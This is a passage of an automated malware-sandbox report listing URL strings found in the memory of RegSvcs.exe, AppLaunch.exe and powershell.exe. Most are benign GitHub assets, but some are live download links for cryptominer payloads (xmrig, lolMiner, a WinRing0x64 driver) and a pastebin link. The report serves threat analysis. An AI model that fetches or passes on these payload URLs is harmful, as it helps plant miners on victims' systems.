                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/X
                  Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/stats
                  Source: 4usfliof.exe, 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, 4usfliof.exe, 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, RegSvcs.exe, 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.github.com/github/collect
                  Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
                  Source: RegSvcs.exe, 0000000B.00000002.1729640854.00000000004D3000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github-cloud.s3.amazonaws.com
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.blog
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys"
                  Source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sysChttps://pastebin.com/raw/PTNbBX
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/lolminer/raw/main/lolMiner.exe
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exe
                  Source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exeyhttps://github.com/S1lentHash/lolmin
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe"
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/collections
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/customer-stories
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/advanced-security
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/startups
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/actions
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/code-review
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/codespaces
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/copilot
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/discussions
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/issues
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/packages
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/security
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/fluidicon.png
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/readme
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/ci-cd
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devops
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devsecops
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/financial-services
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/healthcare
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/manufacturing
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/team
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/topics
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/trending
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.comD
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/a
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-11260080
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/behaviors-d6d4678bf9a9.js
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark-9c5b7a476542.css
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-56fff47acadc.css
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-afda8eb0fb33.css
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-2494e44ccdc5.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-68d6b2c79663.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/element-registry-d1e61f0bd7b5.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/environment-924e60bca7d2.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/error-4eb12c8f65b5.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-e4eed26e112b.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-elements-508a45ca23c6.js
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/global-9e6d890d55ca.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-a84d01efac8c.js
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light-3e154969b9f9.css
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_colorblind-71cd4cc132ec.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-fd5499848985.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-31d17ba3e139.css
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/notifications-global-54f34167118d.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-ff8ec1db4f06.css
